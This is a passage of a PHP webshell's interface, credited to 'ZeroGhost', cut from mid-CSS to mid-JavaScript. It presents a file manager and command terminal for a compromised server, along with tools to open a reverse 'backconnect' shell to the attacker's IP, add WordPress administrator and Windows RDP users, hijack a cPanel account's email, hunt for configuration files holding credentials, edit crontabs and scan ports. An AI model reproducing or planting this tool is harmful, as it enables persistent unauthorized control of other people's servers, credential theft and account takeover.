.writable-indicator {display: inline-block;width: 10px;height: 10px;border-radius: 50%;margin-left: 5px;}
.writable-true {background: var(--success);}
.writable-false {background: var(--accent);}
.file-details {display: flex;flex-direction: column;gap: 2px;font-size: 11px;color: var(--text-secondary);margin-left: 10px;}
.file-detail-item {display: flex;align-items: center;gap: 5px;}
.file-permission {font-family: 'Roboto Mono', monospace;background: #00461038;padding: 1px 4px;border-radius: 3px;font-size: 10px;border: #ffe60057 1px solid;}
.current-dir-info {background: var(--card-bg);padding: 10px 15px;border-radius: 5px;margin-bottom: 15px;box-shadow: var(--shadow);display: flex;align-items: center;gap: 10px;flex-wrap: wrap;}
.dir-status {display: flex;align-items: center;gap: 5px;padding: 3px 8px;border-radius: 3px;font-size: 12px;font-weight: 500;}
.dir-writable {background: #d4edda;color: #155724;}
.dir-readonly {background: #f8d7da;color: #721c24;}
.context-menu {display: none;position: absolute;background: var(--card-bg);border: gold 1px solid;border-radius: 5px;box-shadow: 0 4px 12px rgba(66, 66, 66, 0.57);z-index: 1000;min-width: 180px;overflow: hidden;}
.context-menu-item {padding: 10px 15px;cursor: pointer;transition: var(--transition);display: flex;align-items: center;gap: 8px;font-size: 13px;}
.context-menu-item:hover {background: #253342ff;}
.context-menu-item:last-child {border-bottom: none;}
.context-menu-item.danger {color: var(--accent);}
.selection-count {background: var(--secondary);color: white;padding: 2px 8px;border-radius: 10px;font-size: 11px;margin-left: 5px;}
@media (max-width: 768px) {
.container {flex-direction: column; }
.sidebar {width: 100%;height: auto;position: relative; }
.file-item {flex-direction: column;align-items: flex-start; }
.file-actions {margin-top: 10px;width: 100%; }
.file-info {margin-left: 0px;margin-top: 5px; }
.tab-buttons {flex-direction: column; }
.tab-button {margin-right: 0;margin-bottom: 5px;border-radius: 5px; }
.tab-button.active::after {display: none; }
.breadcrumb {flex-direction: column;align-items: flex-start; }
.home-btn {margin-left: 0;margin-top: 10px; }
}
.bkk {background-color: #4CAF50;color: white;border: none;padding: 8px 15px;border-radius: 5px;cursor: pointer;font-size: 14px;margin-bottom: 10px;transition: background-color 0.3s;width: 100%;}
.bkk:hover {background-color: #45a049;}
.bkk:disabled {background-color: #cccccc;cursor: not-allowed;}
.icon {margin-right: 5px;}
</style>
</head>
<body>
<div class="container">
<!-- Sidebar -->
<div class="sidebar">
<div class="sidebar-logo">
<div class="image-container">
<img src="https://takenupload.com/695f48374f175" alt="Animated GIF" class="full-size-image">
</div>
<div>
<!-- <h2><i class="fas fa-terminal"></i> @ZeroGhost</h2> -->
<div class="header-icons">
<!-- <a href="#" target="_blank" class="header-icon" title="GitHub">
<i class="fab fa-github"></i>
</a>
<a href="#" target="_blank" class="header-icon" title="Telegram">
<i class="fab fa-telegram"></i>
</a>
<a href="#" target="_blank" class="header-icon" title="Website">
<i class="fas fa-globe"></i>
</a> -->
<p>By <em>ZeroGhost</em></p>
</div>
</div>
</div>
<!-- <style>
.bkk {background-color: #4CAF50; color: white; border: none; padding: 8px 15px; border-radius: 5px; cursor: pointer; font-size: 14px; margin-bottom: 10px; transition: background-color 0.3s; width: 100%;}
.bkk:hover {background-color: #45a049;}
.bkk:disabled {background-color: #cccccc; cursor: not-allowed;}
.icon {margin-right: 5px;}
</style>
<audio id="myAudio" controls autoplay loop style="display: none;">
<source src="555" type="audio/mpeg">
</audio>
<button class="bkk" id="playBtn" onclick="playAudio()">
<span class="icon">▶</span> Play
</button>
<script>
const audio = document.getElementById("myAudio");
const playBtn = document.getElementById("playBtn");
function playAudio() {
if (audio.paused) {
audio.play();
playBtn.innerHTML = '<span class="icon">⏸</span> Jeda Musik';
} else {
audio.pause();
playBtn.innerHTML = '<span class="icon">▶</span> Putar Musik';
}
}
audio.addEventListener('ended', function() {
playBtn.innerHTML = '<span class="icon">▶</span> Putar Musik';
});
</script> -->
<div class="sidebar-section">
<h4><i class="fas fa-folder-open"></i> Quick Navigation</h4>
<div class="sidebar-buttons">
<a href="?dir=<?php echo urlencode($home_dir); ?>" class="sidebar-btn">
<i class="fas fa-home"></i> Home Directory
</a>
<a href="?dir=/" class="sidebar-btn">
<i class="fas fa-hdd"></i> Root Directory
</a>
<a href="?dir=/etc" class="sidebar-btn">
<i class="fas fa-cogs"></i> /etc
</a>
<a href="?dir=/tmp" class="sidebar-btn">
<i class="fas fa-temp"></i> /tmp
</a>
<a href="?dir=/var/www" class="sidebar-btn">
<i class="fas fa-globe"></i> /var/www
</a>
</div>
</div>
<div class="sidebar-section">
<h4><i class="fas fa-tools"></i> Advanced Tools</h4>
<div class="sidebar-buttons">
<button onclick="showWpUser()" class="sidebar-btn">
<i class="fas fa-user-plus"></i> Add WP User
</button>
<button onclick="showPortScanner()" class="sidebar-btn">
<i class="fas fa-network-wired"></i> Port Scanner
</button>
<button onclick="showWebshellScanner()" class="sidebar-btn">
<i class="fas fa-shield-alt"></i> Webshell Scanner
</button>
<button onclick="showBackconnect()" class="sidebar-btn">
<i class="fas fa-plug"></i> Backconnect
</button>
<button onclick="showConfigHunter()" class="sidebar-btn">
<i class="fas fa-search"></i> Config Hunter
</button>
<button onclick="showCpanelReset()" class="sidebar-btn">
<i class="fas fa-sync"></i> Reset cPanel
</button>
<button onclick="showCrontabManager()" class="sidebar-btn">
<i class="fas fa-clock"></i> Manage Crontab
</button>
<button onclick="showRdpManager()" class="sidebar-btn">
<i class="fas fa-desktop"></i> RDP Manager
</button>
</div>
</div>
</div>
<div class="main">
<div class="system-info">
<div style="display: flex; justify-content: space-between; align-items: center; flex-wrap: wrap;">
<div style="display: flex; flex-wrap: wrap; gap: 20px;">
<div class="info-row">
<span class="info-label"><i class="fas fa-user"></i> <strong>User:</strong></span>
<span class="info-value"><?php echo @get_current_user(); ?></span>
</div>
<div class="info-row">
<span class="info-label"><i class="fas fa-code"></i> <strong>PHP Version:</strong></span>
<span class="info-value"><?php echo phpversion(); ?></span>
</div>
<div class="info-row">
<span class="info-label"><i class="fas fa-server"></i> <strong>Server Software:</strong></span>
<span class="info-value"><?php echo $_SERVER['SERVER_SOFTWARE'] ?? 'N/A'; ?></span>
</div>
</div>
<!-- <div class="login-info"> -->
<a href="?logout=true" class="logout-btn">
<i class="fas fa-sign-out-alt"></i> Logout
</a>
<!-- </div> -->
</div>
<div style="display: flex; flex-wrap: wrap; gap: 20px;">
<div class="info-row">
<span class="info-label"><i class="fas fa-desktop"></i> <strong>Hostname:</strong></span>
<span class="info-value"><?php echo php_uname('n'); ?></span>
</div>
<div class="info-row">
<span class="info-label"><i class="fas fa-microchip"></i> <strong>Kernel Version:</strong></span>
<span class="info-value"><?php echo php_uname('v'); ?></span>
</div>
<div class="info-row">
<span class="info-label"><i class="fas fa-network-wired"></i> <strong>Server IP:</strong></span>
<span class="info-value"><?php echo $_SERVER['SERVER_ADDR'] ?? $_SERVER['LOCAL_ADDR'] ?? gethostbyname($_SERVER['SERVER_NAME']) ?? 'N/A'; ?></span>
</div>
</div>
</div>
<div class="breadcrumb">
<div class="dir-status <?php echo is_writable_dir($current_dir) ? 'dir-writable' : 'dir-readonly'; ?>">
<i class="fas <?php echo is_writable_dir($current_dir) ? 'fa-check-circle' : 'fa-exclamation-circle'; ?>"></i>
<?php echo is_writable_dir($current_dir) ? 'Writable' : 'Read Only'; ?>
</div>
<div style="display: flex; align-items: center; flex-wrap: wrap; gap: 5px;">
<strong><i class="fas fa-folder"></i> Pwd:</strong>
<?php
$path_parts = [];
$temp_path = $current_dir;
while ($temp_path != '.' && $temp_path != '/') {
$path_parts[] = ['name' => basename($temp_path), 'path' => $temp_path];
$temp_path = dirname($temp_path);
}
$path_parts[] = ['name' => 'Root', 'path' => '.'];
$path_parts = array_reverse($path_parts);
foreach ($path_parts as $index => $part) {
if ($index > 0) echo ' <i class="fas fa-chevron-right" style="font-size:10px;"></i> ';
echo '<a href="?dir='.urlencode($part['path']).'" class="dir-link">'.htmlspecialchars($part['name']).'</a>';
}
?>
</div>
<a href="?dir=<?php echo urlencode($home_dir); ?>" class="bayy"><i class="fas fa-home"></i> Home</a>
<br><div style="font-size: 12px; color: var(--text-secondary);">
<strong>Current:</strong> <?php echo realpath($current_dir); ?>
</div>
</div>
<div class="tab-container">
<div class="tab-buttons">
<button class="tab-button active" onclick="switchTab('fileManager')">
<i class="fas fa-folder"></i> File Manager
</button>
<button class="tab-button" onclick="switchTab('terminal')" id="terminalTabButton">
<i class="fas fa-terminal"></i> Terminal
</button>
<button class="tab-button" onclick="switchTab('crontab')">
<i class="fas fa-clock"></i> Crontab Manager
</button>
</div>
<div id="fileManager" class="tab-content active">
<div class="toolbar">
<button onclick="showUpload()" class="btn btn-success">
<i class="fas fa-upload"></i> Upload File
</button>
<button onclick="showMkdir()" class="btn btn-info">
<i class="fas fa-folder-plus"></i> Create Folder
</button>
<button onclick="showNewFile()" class="btn btn-warning">
<i class="fas fa-file-plus"></i> New File
</button>
<button onclick="showZipFiles()" class="btn btn-primary" id="zipBtn" disabled>
<i class="fas fa-file-archive"></i> Zip Selected (<span id="selectedCount">0</span>)
</button>
<button onclick="showUnzipFile()" class="btn btn-secondary">
<i class="fas fa-expand-arrows-alt"></i> Unzip File
</button>
</div>
<div class="section">
<h3 style="margin-bottom: 15px;">
<i class="fas fa-list"></i> Directory Contents
</h3>
<div class="file-list" id="fileList">
<?php
if ($current_dir != '.' && $current_dir != '/') {
$parent = dirname($current_dir);
$parent_writable = is_writable_dir($parent);
echo '<div class="file-item">
<span class="file-name">
<span class="icon-folder"><i class="fas fa-folder"></i></span>
<a href="?dir='.urlencode($parent).'" class="dir-link">
Parent Directory
' . (!$parent_writable ? '<span class="writable-indicator writable-false" title="Read Only"></span>' : '') . '
</a>
</span>
<div class="file-actions">
<span class="file-info">DIR</span>
</div>
</div>';
}
$files = @scandir($current_dir);
if ($files) {
foreach ($files as $file) {
if ($file == '.' || $file == '..') continue;
$fullpath = $current_dir . '/' . $file;
$is_dir = @is_dir($fullpath);
$icon = $is_dir ? '<span class="icon-folder"><i class="fas fa-folder"></i></span>' : '<span class="icon-file"><i class="fas fa-file"></i></span>';
$size = $is_dir ? '-' : format_size(@filesize($fullpath));
$perms = substr(sprintf('%o', @fileperms($fullpath)), -4);
$time = @date('Y-m-d H:i:s', @filemtime($fullpath));
$created = @date('Y-m-d H:i:s', @filectime($fullpath));
$is_writable = is_writable($fullpath);
echo '<div class="file-item" data-file="'.htmlspecialchars($file).'" data-path="'.htmlspecialchars($fullpath).'" data-type="'.($is_dir ? 'dir' : 'file').'">
<span class="file-name">'.$icon.' ';
if ($is_dir) {
$dir_writable = is_writable_dir($fullpath);
echo '<a href="?dir='.urlencode($fullpath).'" class="dir-link">'.htmlspecialchars($file);
if (!$dir_writable) {
echo ' <span class="writable-indicator writable-false" title="Read Only"></span>';
}
echo '</a>';
} else {
echo htmlspecialchars($file);
if (!$is_writable) {
echo ' <span class="writable-indicator writable-false" title="Read Only"></span>';
}
}
echo '</span>';
// echo '<div class="file-actions">';
// if (!$is_dir) {
// echo '<a href="?action=download&file='.urlencode($fullpath).'&dir='.urlencode($current_dir).'" class="btn btn-info" title="Download"><i class="fas fa-download"></i></a>
// <button onclick="editFile(\''.addslashes($fullpath).'\')" class="btn btn-warning" title="Edit" ' . (!$is_writable ? 'disabled' : '') . '><i class="fas fa-edit"></i></button>';
// }
// echo '<button onclick="chmodFile(\''.addslashes($fullpath).'\', \''.$perms.'\')" class="btn btn-secondary" title="Change Permissions"><i class="fas fa-key"></i></button>
// <button onclick="renameFile(\''.addslashes($fullpath).'\')" class="btn btn-primary" title="Rename" ' . (!$is_writable ? 'disabled' : '') . '><i class="fas fa-i-cursor"></i></button>
// <button onclick="deleteFile(\''.addslashes($fullpath).'\')" class="btn btn-danger" title="Delete" ' . (!$is_writable ? 'disabled' : '') . '><i class="fas fa-trash"></i></button>
// </div>';
echo '<div class="file-details">
<div class="file-detail-item">
<i class="fas fa-calendar" style="font-size:9px;"></i>
<span>Created: ' . $created . '</span>
</div>
<div class="file-detail-item">
<i class="fas fa-edit" style="font-size:9px;"></i>
<span>Modified: ' . $time . '</span>
</div>
<div class="file-detail-item">
<i class="fas fa-key" style="font-size:9px;"></i>
<span class="file-permission">' . $perms . '</span>
</div>
</div>';
echo '</div>';
}
} else {
echo '<div class="file-item">Cannot read directory contents</div>';
}
?>
</div>
</div>
</div>
<div id="terminal" class="tab-content">
<div class="section">
<h3 style="margin-bottom: 15px;">
<i class="fas fa-terminal"></i> System Terminal
</h3>
<div class="terminal">
<div class="command-history" id="commandHistory"></div>
<div class="terminal-output" id="terminalOutput">
<div style="color: #7f8c8d;">// Terminal ready. Type commands below.</div>
</div>
<div style="display: flex; gap: 10px; margin-bottom: 10px;">
<input type="text" name="command" class="terminal-input" placeholder="Enter command..." id="terminalInput">
<button type="button" class="btn btn-success" onclick="executeCommand()" id="executeBtn">
<i class="fas fa-play"></i> Execute
</button>
</div>
<div style="display: flex; gap: 5px; flex-wrap: wrap;">
<button type="button" class="btn btn-secondary" onclick="clearTerminal()">
<i class="fas fa-broom"></i> Clear
</button>
<button type="button" class="btn btn-info" onclick="insertCommonCommand('pwd')">pwd</button>
<button type="button" class="btn btn-info" onclick="insertCommonCommand('ls -la')">ls -la</button>
<button type="button" class="btn btn-info" onclick="insertCommonCommand('whoami')">whoami</button>
<button type="button" class="btn btn-info" onclick="insertCommonCommand('id')">id</button>
<button type="button" class="btn btn-info" onclick="insertCommonCommandWithDir('ls -la')">ls -la (current dir)</button>
</div>
</div>
</div>
</div>
<div id="crontab" class="tab-content">
<div class="section">
<h3 style="margin-bottom: 15px;">
<i class="fas fa-clock"></i> Crontab Manager
</h3>
<div class="terminal">
<div class="terminal-output" id="crontabOutput" style="height: 50px;">Loading crontab...</div>
<textarea id="crontabContent" style="width:100%; height:200px; margin:10px 0; font-family: 'Roboto Mono', monospace; font-size: 13px;" placeholder="Edit crontab content here..."></textarea>
<div style="display: flex; gap: 10px; flex-wrap: wrap;">
<button type="button" class="btn btn-success" onclick="saveCrontab()">
<i class="fas fa-save"></i> Save Crontab
</button>
<button type="button" class="btn btn-info" onclick="loadCrontab()">
<i class="fas fa-sync"></i> Reload
</button>
<button type="button" class="btn btn-warning" onclick="addCrontabExample()">
<i class="fas fa-plus"></i> Add Example
</button>
<button type="button" class="btn btn-secondary" onclick="clearCrontab()">
<i class="fas fa-eraser"></i> Clear
</button>
</div>
</div>
</div>
</div>
<div id="wpUser" class="tab-content">
<div class="section">
<h3 style="margin-bottom: 15px;">Add WordPress User</h3>
<div class="terminal">
<div class="terminal-output" id="wpUserOutput" style="height: 100px;"></div>
<form id="wpUserForm">
<input type="text" name="wp_config_path" placeholder="Path to wp-config.php (e.g., /var/www/html/wp-config.php)" style="margin: 10px 0;">
<input type="text" name="username" placeholder="Username" style="margin: 10px 0;">
<input type="password" name="password" placeholder="Password" style="margin: 10px 0;">
<input type="email" name="email" placeholder="Email" style="margin: 10px 0;">
<select name="role" style="margin: 10px 0;">
<option value="subscriber">Subscriber</option>
<option value="contributor">Contributor</option>
<option value="author">Author</option>
<option value="editor">Editor</option>
<option value="administrator">Administrator</option>
</select>
<div style="display: flex; gap: 10px; margin-top: 20px;">
<button type="button" class="btn btn-success" onclick="addWpUser()">Add User</button>
<button type="button" class="btn btn-info" onclick="findWpConfig()">Find wp-config.php</button>
</div>
</form>
</div>
</div>
</div>
<div id="portScanner" class="tab-content">
<div class="section">
<h3 style="margin-bottom: 15px;">Port Scanner</h3>
<div class="terminal">
<div class="terminal-output" id="portScannerOutput" style="height: 300px;"></div>
<input type="text" id="scanHost" placeholder="Host (e.g., localhost or IP)" value="localhost" style="margin: 10px 0;">
<input type="text" id="scanPorts" placeholder="Ports (comma separated)" value="21,22,23,25,53,80,110,115,135,139,143,194,443,445,993,995,1433,3306,3389,5432,5900,6379,27017" style="margin: 10px 0;">
<div style="display: flex; gap: 10px;">
<button type="button" class="btn btn-success" onclick="scanPorts()">Scan Ports</button>
<button type="button" class="btn btn-info" onclick="quickScan()">Quick Scan</button>
<button type="button" class="btn btn-secondary" onclick="document.getElementById('portScannerOutput').innerHTML = ''">Clear</button>
</div>
</div>
</div>
</div>
<div id="webshellScanner" class="tab-content">
<div class="section">
<h3 style="margin-bottom: 15px;">Webshell Scanner</h3>
<div class="terminal">
<div class="terminal-output" id="webshellScannerOutput" style="height: 50px;"></div>
<input type="text" id="scanPath" placeholder="Path to scan (e.g., /var/www)" value="/var/www" style="margin: 10px 0;">
<div style="display: flex; gap: 10px;">
<button type="button" class="btn btn-danger" onclick="scanWebshells()">Scan for Webshells</button>
<button type="button" class="btn btn-secondary" onclick="document.getElementById('webshellScannerOutput').innerHTML = ''">Clear</button>
</div>
<div id="webshellResults" style="margin-top: 20px;"></div>
</div>
</div>
</div>
<div id="backconnect" class="tab-content">
<div class="section">
<h3 style="margin-bottom: 15px;">Backconnect</h3>
<div class="terminal">
<div class="terminal-output" id="backconnectOutput" style="height: 300px;"></div>
<input type="text" id="backconnectHost" placeholder="Your IP address" style="margin: 10px 0;">
<input type="text" id="backconnectPort" placeholder="Port" value="4444" style="margin: 10px 0;">
<div style="display: flex; gap: 10px;">
<button type="button" class="btn btn-success" onclick="startBackconnect()">Start Backconnect</button>
<button type="button" class="btn btn-info" onclick="showBackconnectHelp()">Help</button>
</div>
</div>
</div>
</div>
<div id="configHunter" class="tab-content">
<div class="section">
<h3 style="margin-bottom: 15px;">Config File Hunter</h3>
<div class="terminal">
<div class="terminal-output" id="configHunterOutput" style="height: 50px;"></div>
<input type="text" id="configScanPath" placeholder="Path to scan (e.g., /var/www)" value="/var/www" style="margin: 10px 0;">
<div style="display: flex; gap: 10px;">
<button type="button" class="btn btn-info" onclick="scanConfigFiles()">Scan Config Files</button>
<button type="button" class="btn btn-secondary" onclick="document.getElementById('configHunterOutput').innerHTML = ''">Clear</button>
</div>
<div id="configResults" style="margin-top: 20px;"></div>
</div>
</div>
</div>
<div id="cpanelReset" class="tab-content">
<div class="section">
<h3 style="margin-bottom: 15px;">cPanel Reset</h3>
<div class="terminal">
<div class="terminal-output" id="cpanelResetOutput" style="height: 50px;"></div>
<input type="email" id="cpanelEmail" placeholder="New email address for cPanel" style="margin: 10px 0;">
<div style="display: flex; gap: 10px;">
<button type="button" class="btn btn-warning" onclick="resetCpanel()">Reset cPanel Email</button>
<button type="button" class="btn btn-info" onclick="showCpanelHelp()">Help</button>
</div>
</div>
</div>
</div>
<div id="rdpManager" class="tab-content">
<div class="section">
<h3 style="margin-bottom: 15px;">RDP Manager (Windows Only)</h3>
<div class="terminal">
<div class="terminal-output" id="rdpManagerOutput" style="height: 100px;"></div>
<div style="margin: 15px 0;">
<h4>Add RDP User</h4>
<input type="text" id="rdpUsername" placeholder="Username" style="margin: 10px 0;">
<input type="password" id="rdpPassword" placeholder="Password" style="margin: 10px 0;">
<div style="display: flex; gap: 10px;">
<button type="button" class="btn btn-success" onclick="addRdpUser()">Add RDP User</button>
<button type="button" class="btn btn-warning" onclick="enableRdp()">Enable RDP</button>
</div>
</div>
<div style="margin: 15px 0;">
<h4>RDP Information</h4>
<div style="background: #f8f9fa; padding: 15px; border-radius: 5px; font-family: 'Roboto Mono', monospace; font-size: 12px;">
<strong>Server IP:</strong> <?php echo $_SERVER['SERVER_ADDR'] ?? $_SERVER['LOCAL_ADDR'] ?? gethostbyname($_SERVER['SERVER_NAME']) ?? 'N/A'; ?><br>
<strong>Default Port:</strong> 3389<br>
<strong>Note:</strong> This feature works only on Windows servers
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="context-menu" id="contextMenu">
<div class="context-menu-item" onclick="contextMenuAction('select')">
<i class="fas fa-check"></i> Select
</div>
<div class="context-menu-item" onclick="contextMenuAction('download')">
<i class="fas fa-download"></i> Download
</div>
<div class="context-menu-item" onclick="contextMenuAction('edit')">
<i class="fas fa-edit"></i> Edit
</div>
<div class="context-menu-item" onclick="contextMenuAction('rename')">
<i class="fas fa-i-cursor"></i> Rename
</div>
<div class="context-menu-item" onclick="contextMenuAction('chmod')">
<i class="fas fa-key"></i> Permissions
</div>
<div class="context-menu-item danger" onclick="contextMenuAction('delete')">
<i class="fas fa-trash"></i> Delete
</div>
</div>
<div id="uploadModal" class="modal">
<div class="modal-content">
<h3 style="margin-bottom: 20px;"><i class="fas fa-upload"></i> Upload File</h3>
<form method="post" enctype="multipart/form-data">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="dir" value="<?php echo htmlspecialchars($current_dir); ?>">
<input type="file" name="file" style="margin: 15px 0;">
<div style="display: flex; gap: 10px; margin-top: 20px;">
<button type="submit" class="btn btn-success">
<i class="fas fa-upload"></i> Upload File
</button>
<button type="button" class="btn btn-danger" onclick="closeModal('uploadModal')">
<i class="fas fa-times"></i> Cancel
</button>
</div>
</form>
</div>
</div>
<div id="mkdirModal" class="modal">
<div class="modal-content">
<h3 style="margin-bottom: 20px;"><i class="fas fa-folder-plus"></i> Create New Folder</h3>
<form method="post">
<input type="hidden" name="action" value="mkdir">
<input type="hidden" name="dir" value="<?php echo htmlspecialchars($current_dir); ?>">
<input type="text" name="dirname" placeholder="Enter folder name" required style="margin: 10px 0;">
<div style="display: flex; gap: 10px; margin-top: 20px;">
<button type="submit" class="btn btn-success">
<i class="fas fa-plus"></i> Create Folder
</button>
<button type="button" class="btn btn-danger" onclick="closeModal('mkdirModal')">
<i class="fas fa-times"></i> Cancel
</button>
</div>
</form>
</div>
</div>
<div id="newfileModal" class="modal">
<div class="modal-content">
<h3 style="margin-bottom: 20px;"><i class="fas fa-file-plus"></i> Create New File</h3>
<form method="post">
<input type="hidden" name="action" value="newfile">
<input type="hidden" name="dir" value="<?php echo htmlspecialchars($current_dir); ?>">
<input type="text" name="filename" placeholder="Enter file name (e.g., example.txt)" required style="margin: 10px 0;">
<textarea name="filecontent" placeholder="File content (optional)" style="height: 300px; margin: 10px 0; font-family: 'Roboto Mono', monospace;"></textarea>
<div style="display: flex; gap: 10px; margin-top: 20px;">
<button type="submit" class="btn btn-success">
<i class="fas fa-plus"></i> Create File
</button>
<button type="button" class="btn btn-danger" onclick="closeModal('newfileModal')">
<i class="fas fa-times"></i> Cancel
</button>
</div>
</form>
</div>
</div>
<div id="editModal" class="modal">
<div class="modal-content">
<h3 style="margin-bottom: 20px;">Edit File: <span id="editFileName"></span></h3>
<form id="editForm">
<input type="hidden" name="filepath" id="editFilePath">
<textarea name="content" id="editFileContent" style="width:100%; height:60vh; border:1px solid #ced4da; padding:15px; font-family: 'Roboto Mono', monospace; background: #ffffff; color: #000000; font-size: 13px;"></textarea>
<div style="display: flex; gap: 10px; margin-top: 20px;">
<button type="button" class="btn btn-success" onclick="saveFile()">Save Changes</button>
<button type="button" class="btn btn-danger" onclick="closeModal('editModal')">Cancel</button>
</div>
</form>
</div>
</div>
<div id="zipModal" class="modal">
<div class="modal-content">
<h3 style="margin-bottom: 20px;"><i class="fas fa-file-archive"></i> Create Zip Archive</h3>
<div id="zipSelectedFiles" style="background: #f8f9fa; padding: 10px; border-radius: 5px; margin-bottom: 15px; max-height: 150px; overflow-y: auto;"></div>
<input type="text" id="zipName" placeholder="Archive name (e.g., backup.zip)" value="archive_<?php echo date('Y-m-d'); ?>.zip" style="margin: 10px 0;">
<div style="display: flex; gap: 10px; margin-top: 20px;">
<button type="button" class="btn btn-success" onclick="createZip()">
<i class="fas fa-file-archive"></i> Create Zip
</button>
<button type="button" class="btn btn-danger" onclick="closeModal('zipModal')">
<i class="fas fa-times"></i> Cancel
</button>
</div>
</div>
</div>
<div id="unzipModal" class="modal">
<div class="modal-content">
<h3 style="margin-bottom: 20px;"><i class="fas fa-expand-arrows-alt"></i> Extract Zip File</h3>
<select id="unzipFileSelect" style="margin: 10px 0;">
<option value="">-- Select zip file --</option>
<?php
$files = @scandir($current_dir);
if ($files) {
foreach ($files as $file) {
if ($file == '.' || $file == '..') continue;
$fullpath = $current_dir . '/' . $file;
if (!is_dir($fullpath) && preg_match('/\.(zip|tar|gz|rar)$/i', $file)) {
echo '<option value="'.htmlspecialchars($fullpath).'">'.htmlspecialchars($file).'</option>';
}
}
}
?>
</select>
<input type="text" id="unzipPath" placeholder="Extraction path (optional)" value="<?php echo htmlspecialchars($current_dir); ?>" style="margin: 10px 0;">
<div style="display: flex; gap: 10px; margin-top: 20px;">
<button type="button" class="btn btn-success" onclick="extractZip()">
<i class="fas fa-expand-arrows-alt"></i> Extract
</button>
<button type="button" class="btn btn-danger" onclick="closeModal('unzipModal')">
<i class="fas fa-times"></i> Cancel
</button>
</div>
</div>
</div>
<script>
let commandHistory = JSON.parse(localStorage.getItem('commandHistory') || '[]');
let currentHistoryIndex = -1;
let selectedFiles = new Set();
let contextMenuTarget = null;
document.addEventListener('DOMContentLoaded', function() {
loadCrontab();
updateCommandHistoryDisplay();
const terminalInput = document.getElementById('terminalInput');
if (terminalInput) {
terminalInput.focus();
terminalInput.addEventListener('keypress', function(e) {
if (e.key === 'Enter') {
executeCommand();
}
});
terminalInput.addEventListener('keydown', function(e) {
if (e.key === 'ArrowUp') {
e.preventDefault();
navigateHistory(-1);
} else if (e.key === 'ArrowDown') {
e.preventDefault();
navigateHistory(1);
}
});
}
document.addEventListener('contextmenu', function(e) {
if (e.target.closest('.file-item')) {
e.preventDefault();
showContextMenu(e);
}
});
document.addEventListener('click', function() {
hideContextMenu();
});
document.addEventListener('click', function(e) {
if (e.target.closest('.file-item') && !e.target.closest('.file-actions')) {
const fileItem = e.target.closest('.file-item');
if (e.ctrlKey || e.metaKey) {
toggleFileSelection(fileItem);
} else if (e.shiftKey) {
selectFileRange(fileItem);
} else {
clearSelection();
toggleFileSelection(fileItem);
}
updateSelectionUI();
}
});
});
function showWpUser() { switchTab('wpUser'); }
function showPortScanner() { switchTab('portScanner'); }
function showWebshellScanner() { switchTab('webshellScanner'); }
function showBackconnect() { switchTab('backconnect'); }
function showConfigHunter() { switchTab('configHunter'); }
function showCpanelReset() { switchTab('cpanelReset'); }
function showCrontabManager() { switchTab('crontab'); }
function showRdpManager() { switchTab('rdpManager'); }
function showUpload() {
document.getElementById('uploadModal').style.display = 'block';
}
function showMkdir() {
document.getElementById('mkdirModal').style.display = 'block';
}
function showNewFile() {
document.getElementById('newfileModal').style.display = 'block';
}
function showZipFiles() {
if (selectedFiles.size === 0) return;
const fileList = document.getElementById('zipSelectedFiles');
fileList.innerHTML = '<strong>Selected files:</strong><br>' +
Array.from(selectedFiles).map(file => `• ${file}`).join('<br>');
document.getElementById('zipModal').style.display = 'block';
}
function showUnzipFile() {
document.getElementById('unzipModal').style.display = 'block';
}
function closeModal(id) {
document.getElementById(id).style.display = 'none';
}
function switchTab(tabName) {
document.querySelectorAll('.tab-content').forEach(tab => {
tab.classList.remove('active');
});
document.querySelectorAll('.tab-button').forEach(button => {
button.classList.remove('active');
});
document.getElementById(tabName).classList.add('active');
event.target.classList.add('active');
if (tabName === 'terminal') {
setTimeout(() => {
document.getElementById('terminalInput').focus();
}, 100);
}
}
function toggleFileSelection(fileItem) {
const fileName = fileItem.dataset.file;
if (selectedFiles.has(fileName)) {
selectedFiles.delete(fileName);
fileItem.classList.remove('selected');
} else {
selectedFiles.add(fileName);
fileItem.classList.add('selected');
}
}
function clearSelection() {
selectedFiles.clear();
document.querySelectorAll('.file-item.selected').forEach(item => {
item.classList.remove('selected');
});
}
function selectFileRange(targetItem) {
const fileItems = Array.from(document.querySelectorAll('.file-item'));
const targetIndex = fileItems.indexOf(targetItem);
if (selectedFiles.size === 0) {
toggleFileSelection(targetItem);
return;
}
let firstSelectedIndex = -1;
for (let i = 0; i < fileItems.length; i++) {
if (fileItems[i].classList.contains('selected')) {
firstSelectedIndex = i;
break;
}
}
if (firstSelectedIndex === -1) return;
const start = Math.min(firstSelectedIndex, targetIndex);
const end = Math.max(firstSelectedIndex, targetIndex);
for (let i = start; i <= end; i++) {
const fileName = fileItems[i].dataset.file;
selectedFiles.add(fileName);
fileItems[i].classList.add('selected');
}
}
function updateSelectionUI() {
const count = selectedFiles.size;
document.getElementById('selectedCount').textContent = count;
document.getElementById('zipBtn').disabled = count === 0;
}
function showContextMenu(e) {
const contextMenu = document.getElementById('contextMenu');
contextMenuTarget = e.target.closest('.file-item');
contextMenu.style.display = 'block';
contextMenu.style.left = e.pageX + 'px';
contextMenu.style.top = e.pageY + 'px';
e.preventDefault();
}
function hideContextMenu() {
document.getElementById('contextMenu').style.display = 'none';
contextMenuTarget = null;
}
function contextMenuAction(action) {
if (!contextMenuTarget) return;
const filePath = contextMenuTarget.dataset.path;
const fileName = contextMenuTarget.dataset.file;
const fileType = contextMenuTarget.dataset.type;
switch (action) {
case 'select':
toggleFileSelection(contextMenuTarget);
updateSelectionUI();
break;
case 'download':
if (fileType !== 'dir') {
window.location.href = '?action=download&file=' + encodeURIComponent(filePath) + '&dir=' + encodeURIComponent('<?php echo $current_dir; ?>');
}
break;
case 'edit':
if (fileType !== 'dir') {
editFile(filePath);
}
break;
case 'rename':
renameFile(filePath);
break;
case 'chmod':
const currentPerm = contextMenuTarget.querySelector('.file-permission').textContent;
chmodFile(filePath, currentPerm);
break;
case 'delete':
deleteFile(filePath);
break;
}
hideContextMenu();
}
function createZip() {
const zipName = document.getElementById('zipName').value;
if (!zipName) {
alert('Please enter a zip file name');
return;
}
const files = Array.from(selectedFiles);
fetch('', {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: `ajax=true&action=zip_files&files=${encodeURIComponent(JSON.stringify(files))}&zip_name=${encodeURIComponent(zipName)}`
})
.then(response => response.json())
.then(data => {
if (data.success) {
alert('Zip file created successfully: ' + data.output);
closeModal('zipModal');
setTimeout(() => {
window.location.reload();
}, 1000);
} else {
alert('Error creating zip: ' + data.output);
}
})
